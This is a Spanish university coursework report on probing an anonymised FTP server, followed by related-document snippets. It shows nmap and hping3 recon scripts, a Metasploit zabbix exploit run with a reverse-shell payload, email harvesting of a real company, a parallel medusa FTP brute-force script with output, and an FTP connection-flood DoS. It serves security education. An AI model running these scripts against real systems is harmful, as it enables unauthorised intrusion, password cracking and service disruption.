Escaneo de servidor FTP Búsqueda de vulnerabilidades

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Escaneo de servidor FTP Búsqueda de vulnerabilidades"

Transcripción

1 Escaneo de servidor FTP Búsqueda de vulnerabilidades David Núñez Álvarez PSI 2011/2012

2 Con motivo de no revelar los datos del servidor al que se le realizó el estudio vamos a suponer que su dominio es ftp.objetivo.com y su IP no será completamente visible. En un principio, sólo conocemos el dominio web del servidor FTP que será nuestro objetivo de estudio, ftp.objetivo.com Nos conectamos al él desde el navegador y vemos que el servicio de FTP esta activo y funcionando correctamente.

3 1.Inicio Lo primero que haremos será conseguir su dirección IP: $nslookup ftp.objetivo.com Name: ftp.objetivo.com Address: Esta IP será la base de todas nuestras pruebas. 1.1)Empezaremos intentando hacer un ping al objetivo. $ ping c PING (1... 6) 56(84) bytes of data ping statistics 3 packets transmitted, 0 received, 100% packet loss, time 2009ms Se ve que el objetivo no responde al ping, esto puede deberse a diferentes motivos, como sabemos que la máquina está funcionando el más común es que tengan desactivada la respuesta a los mensajes ICMP. 1.2)Intentaremos llegar a él a través de otros medios como traceroute para hacernos una idea de qué máquinas hay entre nosotros y el objetivo a ver si descubrimos algo, lo mas seguro es que también se nos filtre antes de llegar al objetivo ya que traceroute funciona sobre ICMP. $traceroute Con la salida que nos dio traceroute vemos que a partir de un punto las direcciones IP se nos ocultan, cosa que nos indica que seguramente estemos pasando a través de un firewall que nos está filtrando la paquetería enviada.

4 1.3)No hay que preocuparse, hay diferentes maneras de llegar a una máquina detrás de un firewall. Una de ellas es con la herramienta hping3. Usaremos la opción t 1 combinada con la opción Z lo que nos permite que al pulsar CTRL+Z el TTL de los paquetes que envía hping3 aumente en 1 y vaya variando el punto que nos responde entre nosotros y el objetivo. Se usará también la opción S que pondrá el flag SYN de TCP a 1, flag que los firewall suelen dejar pasar ya que es el flag que permite iniciar una conexión TCP. #hping3-s-t1-p21-n-z HPING1... 6(wlan ):Sset,40headers+0databytes TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :len=44ip=1... 6ttl=116DFid=14741sport=21flags=SAseq=27win=8192rtt=58.3ms len=44ip=1... 6ttl=116DFid=14742sport=21flags=SAseq=28win=8192rtt=59.4ms len=44ip=1... 6ttl=116DFid=14743sport=21flags=SAseq=29win=8192rtt=58.6ms Hemos tenido suerte, conseguimos pasar a través del firewall y alcanzar nuestro objetivo. Con esto descubrimos la IP del firewall y los saltos que hay entre este y la máquina objetivo. En un principio nuestro objetivo para este report es la IP donde se encuentra el servidor FTP, pero con la salida anterior hemos descubierto dónde está el firewall, otra posible máquina vulnerable de la red interna.

5 2)Descubrimiento Continuaremos el análisis intentando descubrir los servicios que tiene nuestra máquina objetivo (se sabe que ya tiene un servidor FTP corriendo en el puerto 21). Usaremos la herramienta nmap. Una buena práctica en un escaneo real sería utilizar opciones de nmap que nos permitan ocultarnos detrás de máquinas zombies como técnicas de idle scan. O usar herramientas como torsocks que nos permitirían meter las pruebas de escaneo por la red TOR y salir a través de una IP diferente a la nuestra. ocultando así quién está escaneando la máquina. Empezaremos con un escaneo a tres puertos conocidos que podrían estar abiertos y con la opción PN que desactiva el "nmap discovering (usando PING) ya que ya sabemos que la máquina existe y está funcionando. # nmap -st -PN -p 21,22,80 -v Starting Nmap 5.00 ( ) at :25 CE NSE: Loaded 0 scripts for scanning. Initiating Connect Scan at 23:25 Scanning [3 ports] Completed Connect Scan at 23:25, 0.76s elapsed (3 total ports Host is up (0.78s latency). Interesting ports on : PORT STATE SERVICE 21/tcp open ftp 22/tcp filtered ssh 80/tcp filtered http Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 1.79 seconds Comprobamos que efectivamente el puerto 21 tiene corriendo ftp detrás, los demás puertos vemos que nmap nos indica que están filtrados. Haremos ahora un escaneo un poco más completo usando directamente el escaneo de nmap sin indicarle puertos, lo que hará que nmap haga un escaneo de los puertos más comúnmente usados (más de 1500).

6 #nmap-st-pn-v StartingNmap5.00(http://nmap.org)at :06CEST NSE:Loaded0scriptsforscanning. InitiatingParallelDNSresolutionof1host.at00:06 CompletedParallelDNSresolutionof1host.at00:06,0.04selapsed InitiatingConnectScanat00:06 Scanning1... 6[1000ports] Host1... 6isup(0.059slatency). Interestingportson1... 6: Notshown:913filteredports PORT STATESERVICE 21/tcp open ftp 24/tcp open priv-mail 80/tcp open http 212/tcp open anet 311/tcp open asip-webadmin 406/tcp open imsp 465/tcp open smtps 667/tcp open unknown 668/tcp open unknown 8443/tcp open https-alt 8873/tcp open unknown 9001/tcp open tor-orport 9009/tcp open unknown 9290/tcp open unknown 10215/tcpopen unknown 10629/tcpopen unknown 13782/tcpopen netbackup 17988/tcpopen unknown 20005/tcpopen btx 30951/tcpopen unknown 32781/tcpopen unknown 33354/tcpopen unknown 40193/tcpopen unknown 44443/tcpopen coldfusion-auth 49155/tcpopen unknown 49999/tcpopen unknown 55600/tcpopen unknown 58080/tcpopen unknown Readdatafilesfrom:/usr/share/nmap Nmapdone:1IPaddress(1hostup)scannedin42.43seconds Vemos que nos indica muchos puertos abiertos, cosa que es un poco extraña, ya que normalmente una máquina no suele tener tantos puertos escuchando, además nos muestra que el puerto 80 está abierto, puerto que anteriormente apareció como filtrado.

7 Esto hace sospechar y haciendo otro escaneo igual que el anterior los puertos que nos indica abiertos son otros completamente distintos. Diferentes sistemas de protección intentan engañar a los intrusos de múltiples maneras. Una de ellas es dando información falsa. Se ve que haciendo escaneos pequeños la información que se nos devuelve acerca de los puertos parece ser correcta. $nmap -st -PN -v -p PORT STATE SERVICE 21/tcp open ftp $nmap -st -PN -v -p PORT STATE SERVICE 80/tcp filtered http Así que intentaremos hacer escaneos más pequeños (y más separados en el tiempo). Se intentará buscar por tanto hacer un escaneo por lo menos a los puertos que forman el conjunto de puertos conocidos y registrados ya que son los más comunes para usar. Sería método muy tedioso (además de largo, ya que cada escaneo tarda unos 2 segundos) intentar hacer escaneos de puerto en puerto manualmente. Creamos un script que ejecute nmap 500 veces, y que empiece en el número que se le indique multiplicado por 500. Así si se le indica 0 escaneará los 500 primeros, 1 del 501 al 1000, 2 del 1001 al 1500 y así sucesivamente. ***************************************************************************************** * nmap.sh * ***************************************************************************************** #!/bin/bash ini=$[1+$1*500]; fin=$[500+$1*500]; for (( i = $ini; i < $fin; i++ )); do nmap -st -PN -v -p $i grep open done *****************************************************************************************

8 Ejecutaremos el script dentro de un bucle for desde el 1 al 100 en paralelo para poder abarcar todos los puertos anteriormente mencionados. Si se tiene un ordenador potente esto no será un problema y tendremos 100 nmap ejecutándose en paralelo cada uno interrogando a un puerto diferente de la máquina. y en pocos minutos obtenemos la salida. $ for (( i = 0; i < 100; i++ )); do./nmap.sh $i & done 21/tcp open ftp 10050/tcp open unknown 49155/tcp open unknown La ejecución funcionó y obtuvimos que la máquina tenía 3 puertos abiertos. 21 (ftp) (desconocido) (desconocido)

9 3)Reconocimiento de aplicaciones. Ya se sabe que puertos tiene la máquina escuchando. Ahora el siguiente paso será saber qué corre detrás de cada puerto. 3.1)Nmap también tiene opciones para "SERVICE AND VERSION DETECTION". Se usa añadiendo la opción sv. Ejecutando diferentes pruebas para los dos puertos nuevos que obtuvimos. $ nmap -PN -sv -p Starting Nmap 5.00 ( ) at :12 CEST Interesting ports on : PORT STATE SERVICE VERSION 49155/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows Service detection performed. Please report any incorrect results at Nmap done: 1 IP address (1 host up) scanned in seconds $ nmap -PN -sv -p Starting Nmap 5.00 ( ) at :13 CEST Interesting ports on : PORT STATE SERVICE VERSION 10050/tcp open tcpwrapped Service detection performed. Please report any incorrect results at Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds Nos indica que en el está corriendo el servicio MS RPC y en el nos indica tcpwrapped (nmap no pudo descubrir que hay en ese puerto e indica que esta filtrado "tcpwrapped") Cuando nmap no puede obtener lo que corre detrás de un puerto o su versión, tiene diferentes opciones para intentar probar de otras maneras, una de ellas es " version intensity X" donde X es un número entre el 0 y el 9. En este caso se probaron con todas las opciones y ninguna dio más datos ni de versión ni de qué servicios son. (Tampoco para el puerto 21)

10 3.2)Hacemos uso de la herramienta netcat para conectarnos a los puertos intentando buscar algún mensaje de bienvenida en alguno de ellos que nos de alguna información a mayores. $nc -v -n (UNKNOWN) [1... 6] 21 (ftp) open 220-Bienvenido al FTP (over ssl) de. 220 Welcome to the FTP server. $ nc -v -n (UNKNOWN) [1... 6] (zabbix-agent) open $ nc -v -n (UNKNOWN) [1... 6] (?) open Con los mensajes de bienvenida no se consiguió nada pero vemos que netcat asocia al puerto la herramienta de monitorización zabbix. 3.3)Otra prueba podría ser buscar en la paquetería que se genera en la conexión al servicio del puerto con alguna herramienta como wireshark. Wireshark asocia también dicho puerto a zabbix. 4)Reconocimiento de SO Nmap también tiene opciones para reconocimiento de sistemas operativos e indicarnos qué sistema operativo hay detrás de una IP. Esto sería usando la opción " O" pero en este caso la herramienta no pudo indicar un sistema operativo concreto mostrando un porcentaje de más del 90 para diferentes sistemas operativos completamente diferentes. Pero también para este caso tenemos grandes posibilidades sabiendo que corre un MS RPC de que la máquina sea Windows(eso sí, no sabemos qué windows).

11 5)Análisis y explotación de vulnerabilidades. Llegados a este punto tenemos que la máquina corre detrás de un firewall Seguramente tenga un sistema de protección que engaña a nuestra herramienta de reconocimiento de aplicaciones y sistemas operativos. La máquina tiene 3 puertos abiertos y detrás de ellos un servidor ftp, el servicio de monitorización zabbix y Microsoft Windows RPC (lo que nos indica que casi seguramente sea una máquina windows). A partir de esto se podrían intentar explotar las vulnerabilidades de la máquina si es que las tiene. Hay herramientas de búsqueda de vulnerabilidades como nessus o páginas en las que se exponen vulnerabilidades y exploits para ellas db.com/. También hay diferentes herramientas online como en las que se busca por ip, dominio(http://www.shodanhq.com/search?q=www.telefonica.com)... Y se obtiene los servicios que corren detrás. Shodan también puede buscar por servicio y ofrecerte exploits para él. 5.1)Una herramienta para la explotación de vulnerabilidades sería metasploit. Metasploit Framework es una incluye gran cantidad de exploits para vulnerabilidades de diversas aplicaciones y las explota remotamente. Se pueden buscar las vulnerabilidades de las aplicaciones objetivo desde la herramienta o en el buscador propio de la página web del proyecto La forma básica de funcionamiento es cargar el exploit que se quiera, configurarlo y lanzarlo, si la máquina es vulnerable a dicho exploit, con pocos clicks se puede conseguir echarla abajo, tomar el control a través de un shell remoto...

12 Ejemplo de cómo se usaría el exploit para zabbix en metasploit: $ msfconsole ## ### ## ## ## ## #### ###### #### ##### ##### ## #### ###### ####### ## ## ## ## ## ## ## ## ## ## ### ## ####### ###### ## ##### #### ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ##### ## ## ## ## ## ## ## #### ### ##### ##### ## #### #### #### ### ## msf > use exploit/unix/misc/zabbix_agent_exec msf exploit(zabbix_agent_exec) > show payloads msf exploit(zabbix_agent_exec) > set PAYLOAD generic/shell_reverse_tcp msf exploit(zabbix_agent_exec) > set LHOST [MY IP ADDRESS] msf exploit(zabbix_agent_exec) > set RHOST [TARGET IP] msf exploit(zabbix_agent_exec) > exploit Después de ver cómo se usa metasploit vamos a buscar exploits que puedan valernos para zabbix o MS RPC. zabbix: Sólo tienen este exploit que afecta a la version de FreeBSD (Ya que la máquina tiene Windows, descartado) Microsoft Windows RPC: La mayoría son exploits para diferentes buffer overflow que tenía en diferentes versiones. PARA (Windows NT SP3 6a/2000/XP/2003 Universal) me PARA (0 Automatic (2000 SP0 SP4, 2003 SP0, 2003 SP1 SP2) (default)

13 1 Windows 2000 Server SP0 SP4+ English 2 Windows 2000 Server SP0 SP4+ Italian 3 Windows 2000 Server SP0 SP4+ French 4 Windows 2003 Server SP0 English 5 Windows 2003 Server SP0 French 6 Windows 2003 Server SP1 SP2 English 7 Windows 2003 Server SP1 SP2 French 8 Windows 2003 Server SP1 SP2 Spanish 9 Windows 2003 Server SP1 SP2 Italian 10 Windows 2003 Server SP1 SP2 German) Ningún exploit llegó a cuajar en la máquina objetivo, si la máquina está bien parcheada y actualizada, la mayoría de los agujeros que pudiese haber en ella, están cerrados. Por esta parte no se pudo obtener nada.

14 6)Análisis y explotación de vulnerabilidades. (PASSWORD GUESSING FTP) Por otra parte sigue estando el servidor ftp. En él tenemos acceso a algunas carpetas como usuario anónimo, pero hay otras a las que sólo pueden acceder usuarios registrados. Algo que se podría intentar es el acceso a dichos directorios, para ello intentaremos loguearnos como usuario con herramientas de password guessing. Este es un proceso largo y bastante complicado, ya que la mayoría de las herramientas prueban passwords por fuerza bruta, nos facilitaría algo el trabajo saber de qué está formada la contraseña, cuantos caracteres tiene... También haría el trabajo mucho más sencillo el tener ya el nombre de algún usuario del sistema. Nosotros sabemos que los nombres de usuario para el servidor ftp son sus direcciones de correo. 6.1)Hay muchas maneras de conseguir un login de un usuario, pero si además sabemos que es la dirección de correo, un script llamado "theharvester.py" nos puede ser muy útil. security.com/theharvester.php Este script nos dará s, nombres de usuario, subdominios y nombres de host buscando en google, bing... De la organización que le indiquemos. Un ejemplo para una compañía como telefónica sería el siguiente: La salida está acortada y los s modificados, pero se puede ver como funcionaría dicho script. $pythontheharvester.py-dtelefonica.com-l200-ball ************************************* *TheHarvesterVer.2.2 * *CodedbyChristianMartorella * *Edge-SecurityResearch * * ************************************* Fullharvest.. [-]SearchinginGoogle.. Searching0results... Searching100results... Searching200results... [-]SearchinginPGPKeyserver.. [-]SearchinginBing.. Searching100results... Searching200results... [-]SearchinginExalead..

15 Searching100results... Searching200results... [+] sfound: demo.telefonica.com [+]Hostsfoundinsearchengines: :www.telefonica.com :mailus.telefonica.com :mailar.telefonica.com :www.infomail.telefonica.com :live.us.telefonica.com :www.fundacion.telefonica.com :us.telefonica.com :saladeprensa.telefonica.com :www.fundacion.telefonica.com :www.multinationalsolutions.telefonica.com [+]Virtualhosts: ================== cesaralierta.telefonica.com juliolinares.telefonica.com maxconn.arancharuiz.com redpacientes.com atlas.telefonica.com informerc.telefonica.com

16 Teniendo un usuario del sistema intentaríamos obtener la contraseña de este usuario por "fuerza bruta" En este caso de ejemplo vamos a usar un fichero con las contraseñas más usadas en internet el usuario "Admin" y el programa medusa. Medusa se usa de la siguiente manera: $medusa-h"ip"-u"nombreusuario"-p"archivodecontraseñas.txt"-mftp-v6 M ftp > indica que use el módulo para servidores ftp v6 > modo verbose Las pruebas de password guessing a servicios web son muy lentas ya que hay que enviar la petición y esperar la respuesta. Una forma de hacer esto un poco más rápido es ejecutar varias consultas en paralelo. Para esto se creó un pequeño script que partiese el fichero de contraseñas en N partes y que ejecute medusa N veces en paralelo cada una usando una parte del archivo partido. ******************************************************************************* ataque.sh ******************************************************************************* #!/bin/bash if [[ $#!= 4 ]]; then echo "./script <nproc> <ficheropass> <host> <usuario>" echo "nproc= numero procesos a ejecutar en paralelo" echo "host = host a atacar con medusa" echo "usuario = usuario a probar con medusa" exit; fi nproc=$1; entrada=$2; host=$3; usuario=$4; #tamano de entrada a traves de wc cogiendo solo numero lineas tam_entrada=`wc -l $entrada cut -f 1 -d " "`; #division entera hacia arriba limite=$[ ($tam_entrada / $nproc) + ($tam_entrada % $nproc) ] i=0; j=0; h=0;

17 echo -n " Dividiendo archivo de passwd " #partimos el archivo en tantos archivos como procesos se indique while read line do if [[ $i -lt $limite ]]; then echo "$line" >> salida$j.txt; i=$[$i + 1]; else j=$[$j + 1]; i=0; fi done < $2 echo "[COMPLETADO]" #se ejecuta en paralelo nproc medusa #uno con cada archivo de passwords for (( k = 0 ; k <= $j ; k++ )) do medusa -h $3 -u $4 -P salida$k.txt -M ftp -v6 & done #borrar archivos auxiliares #rm salida*; ******************************************************************************* Un ejemplo de uso del script con 5 ejecuciones paralelas sería: (./ataque NUMEROPROCESOS FICHEROPASSWORDS.txt IP NOMBREUSUARIO): $./ataque.sh5passwords2.txt1... 6admin Dividiendoarchivodepasswd[COMPLETADO] GENERAL:ParallelHosts:1ParallelLogins:1 GENERAL:TotalHosts:1 GENERAL:TotalUsers:1 GENERAL:TotalPasswords:200 GENERAL:ParallelHosts:1ParallelLogins:1 GENERAL:TotalHosts:1 GENERAL:TotalUsers:1 GENERAL:TotalPasswords:196 GENERAL:ParallelHosts:1ParallelLogins:1 GENERAL:TotalHosts:1

18 GENERAL:TotalUsers:1 GENERAL:ParallelHosts:1ParallelLogins:1 GENERAL:TotalHosts:1 GENERAL:TotalUsers:1 GENERAL:TotalPasswords:200 GENERAL:TotalPasswords:200 GENERAL:ParallelHosts:1ParallelLogins:1 GENERAL:TotalHosts:1 GENERAL:TotalUsers:1 GENERAL:TotalPasswords:200 ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:superman1(1of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:justus(1of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:unreal(1of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:niklas(1of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:123456(1of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:bullshit(2of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:area51(2of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:rasmus(2of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:ibanez(2of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:password(2of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:131313(3of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:deadman(3of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password: (3of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:helistin(3of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:terror(3of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:fucker(4of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:redbull(4of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:qwerty(4of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:blizzard(4of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:reaper(4of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:martin(5of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:jaguar(5of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password: (5of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:donald(5of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:undertaker(5of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:9452(6of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password: (6of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:111111(6of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:juventus(6of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:kawasaki(6of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:parker(7of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:jackass(7of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:abc123(7of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:vincent(7of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password: (7of200complete)... Según la potencia(número de máquinas, potencia de cada máquina, velocidad de la conexión...) que tenga el atacante podría realizar este ataque en horas, dias, meses... Y una razón básica para poder realizar esto es que este servidor ftp no corta a quienes hagan muchos intentos fallidos de acceso o a IPs que intentan conexiones simultáneas. Una acción muy común es usar para todos los servicios internos la misma contraseña, si con este método se llegase a sacar la contraseña de algún usuario, muy probablemente podríamos acceder no sólo al servidor ftp como él, si no a otros servicios de la organización...

19 6)Análisis y explotación de vulnerabilidades. (FLOOD FTP) Como se pudo observar en el apartado anterior el servidor ftp no tiene límite de conexiones para una misma IP, ni bloquea IPs que hagan muchos intentos fallidos de conexión. Esto también podría servir para realizar ataques de denegación de servicio, en un servidor ftp sin tirar abajo dicho servidor un ataque de denegación de servicio podría ser el obtener todas las conexiones que permita establecer el servidor, impidiendo que los demás usuarios puedan conectarse. Se creó un programa en C, floodftp, ( )que establece conexiones anónimas contra un servidor ftp y no las cierra. El programa se ejecutaría: $./floodftp Elprogramaquedaejecutándose,leyendonúmeroseintentandohaceresenúmerodeconexiones contraelservidorftp. Haciendo diversas pruebas en el servidor y a la vez mostrando las conexiones establecidas entre nuestra máquina y el servidor: $watch-n1 'netstat-tupen grepfloodftp grepestablished wc-l' Se comprueba que el servidor permite establecer un máximo de 500 conexiones. Si se establece una conexión el servidor no la cierra. Pero estableciendo las 500 máximas a los 35 segundos el servidor cierra todas. A partir de lo observado en las pruebas hechas con floodftp se llega a la conclusión de que estableciendo cada 35 segundos las 500 conexiones sería muy complicado a los demás usuarios acceder al servidor debido a la denegación del servicio que estamos creando.

20 Finalmente se llega a la conclusión de que el servidor es bastante seguro, está lo suficientemente parcheado o actualizado para que no tenga vulnerabilidades en las aplicaciones que tiene corriendo. Centrándonos en la aplicación propia del servidor ftp del puerto 21, ésta permite múltiples conexiones de una misma IP y múltiples intentos de inicio sesión fallidos. Las múltiples conexiones desde una misma IP nos permiten poder obtener a un mismo usuario todas las conexiones impidiendo a los demás conectarse. Pero si se corta esto se impediría que por ejemplo en lugares en los que un conjunto de máquinas salen a través de la misma IP, como puede ser la facultad, nos pudiésemos conectar simultáneamente a este servidor de internet. La parte de que el servidor no límite el número de intentos de logearse podría considerarse un fallo de seguridad, pero si las contraseñas son lo suficientemente seguras, sería casi imposible con herramientas de password guessing remoto obtener una contraseña.

NOTA. HONEYPOT II Servicios con HoneyBOT. Objetivo: Usar un honeypot con varios servicios de interacción media. Herramientas necesarias:

NOTA. HONEYPOT II Servicios con HoneyBOT. Objetivo: Usar un honeypot con varios servicios de interacción media. Herramientas necesarias: HONEYPOT II Servicios con HoneyBOT Popularidad: 8 Simplicidad: 10 Impacto: 5 Nivel de Riesgo: 2 Objetivo: Usar un honeypot con varios servicios de interacción media Herramientas necesarias: HoneyBOT (http://www.atomicsoftwaresolutions.com/download.php)

Más detalles

Apartado: Brutalix Versión: 3 Título: Monitorización redes. nmap Fecha: 15/06/07

Apartado: Brutalix Versión: 3 Título: Monitorización redes. nmap Fecha: 15/06/07 *PRÓPOSITO. Conocer como monitorizar una red con el programa Nmap. *CONDICIONES INICIALES. Ordenador con capacidad de arranque desde CDROM. *MATERIAL ASOCIADO. Disponer del live-cd 1 de la distribución

Más detalles

NMAP. Fundamentos de Auditoria: Software de Auditoria Seguridad informática

NMAP. Fundamentos de Auditoria: Software de Auditoria Seguridad informática NMAP Nmap se define como una suite de herramientas de descubrimiento de redes de código abierto, ha sido utilizada desde hace mucho tiempo en procesos de auditorías de seguridad ya que la misma permite

Más detalles

Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis.

Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. Actividad 4. Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. MBSA: instalamos Microsoft Baseline Security Analyzer (es gratis), y pulsamos en la opción Scan a computer. GFI Languard:

Más detalles

Uso del Escaner de puertos Nmap

Uso del Escaner de puertos Nmap 1. Copyleft 2004 debianitas.net Emilio Guirado Hernández Se puede copiar, modificar o distribuir este manual bajo las condiciones de la licencia GNU General Public License ( GNU GPL ) Si se desea hacer

Más detalles

Criptografía y Seguridad en Redes de Comunicaciones Profesor: Álvaro Alesanco Iglesias (revisado 12-05-2010)

Criptografía y Seguridad en Redes de Comunicaciones Profesor: Álvaro Alesanco Iglesias (revisado 12-05-2010) Seguridad en Redes de Comunicaciones Criptografía y Seguridad en Redes de Comunicaciones Profesor: Álvaro Alesanco Iglesias (revisado 12-05-2010) 1 Objetivos Se pretende que la práctica sea una demostración

Más detalles

SECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes.

SECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes. SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a la familia de Sistemas

Más detalles

Lab 04. Herramientas de Seguridad. Área de Telemática. Seguridad de la información Universidad de Antioquia

Lab 04. Herramientas de Seguridad. Área de Telemática. Seguridad de la información Universidad de Antioquia Lab 04 Herramientas de Seguridad Área de Telemática Seguridad de la información Universidad de Antioquia Actividad 01: Manejo de Netcat Netcat, tmabién denominado NC, es una aplicación conocida como la

Más detalles

www.securityartwork.es www.csirtcv.gva.es www.s2grupo.es NMAP José Luis Chica Uribe Técnico en seguridad CSIRT-cv

www.securityartwork.es www.csirtcv.gva.es www.s2grupo.es NMAP José Luis Chica Uribe Técnico en seguridad CSIRT-cv www.securityartwork.es www.csirtcv.gva.es www.s2grupo.es NMAP José Luis Chica Uribe Técnico en seguridad CSIRT-cv Índice Indroducción Descubrimiento de equipos y puertos Detectando la versión del SSOO

Más detalles

Hacking Ético. Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo

Hacking Ético. Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo Hacking Ético Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo Objetivos Detectar sistemas vivos en la red. Descubrir servicios que se están ejecutando o que están escuchando en

Más detalles

La herramienta nmap. Nmap. Roberto Gómez Cárdenas rogomez@itesm.mx http://homepage.cem.itesm.mx/rogomez. La herramienta nmap. Dr.

La herramienta nmap. Nmap. Roberto Gómez Cárdenas rogomez@itesm.mx http://homepage.cem.itesm.mx/rogomez. La herramienta nmap. Dr. Cárdenas Roberto Gómez Cárdenas rogomez@itesm.mx http://homepage.cem.itesm.mx/rogomez Lámina 1 Nmap Lámina 2 1 Cárdenas Matrix y nmap Lámina 3 Características Nmap NMAP Network Security Scanner Herramienta

Más detalles

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas Laboratorio de Seguridad en aplicaciones web Practica 2: Configuración de VPN y escaneo de puertos. Objetivos: En esta práctica

Más detalles

Ataque a servidores DNS

Ataque a servidores DNS Ataque a servidores DNS A continuación se procede a exponer los principales ataques a servidores DNS con algún que otro caso práctico. Para realizar las pruebas se ha utilizado la suite de herramientas

Más detalles

HERRAMIENTA PARA EL MAPEO DE LA RED

HERRAMIENTA PARA EL MAPEO DE LA RED HERRAMIENTA PARA EL MAPEO DE LA RED Network mapper >nmap TITULO: NETWORK MAPPING FROM LINUX OS (PARTE 1) AUTOR: Luis Miguel Castañeda Ibañez ESTUDIANTE DE LA FACULTAD #2, 4TO AÑO Network Mapper, más conocida

Más detalles

..::[Manual Basico Metasploit]::..

..::[Manual Basico Metasploit]::.. ..::[Manual Basico Metasploit]::.. Creador TheJez 1) Conceptos Basicos 2) Modalidades 3) Comienzos 4) Exploits 5) Actualizar 1. Conceptos Basicos. Para empezar a hablar del metasploit, lo definiremos como

Más detalles

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas W8: wexplor VIROLOGÌA Y CRIPTOLOGÌA 4NM73 W8:INTERNET EXPLORER U5: FILE TRANSFER

Más detalles

HONEYPOT III Servicios emulados con Valhalla Honeypot

HONEYPOT III Servicios emulados con Valhalla Honeypot HONEYPOT III Servicios emulados con Valhalla Honeypot Popularidad: 2 Simplicidad: 10 Impacto: 9 Nivel de Riesgo: 4 Objetivo: Usar un honeypot con varios servicios de interacción media Herramientas necesarias:

Más detalles

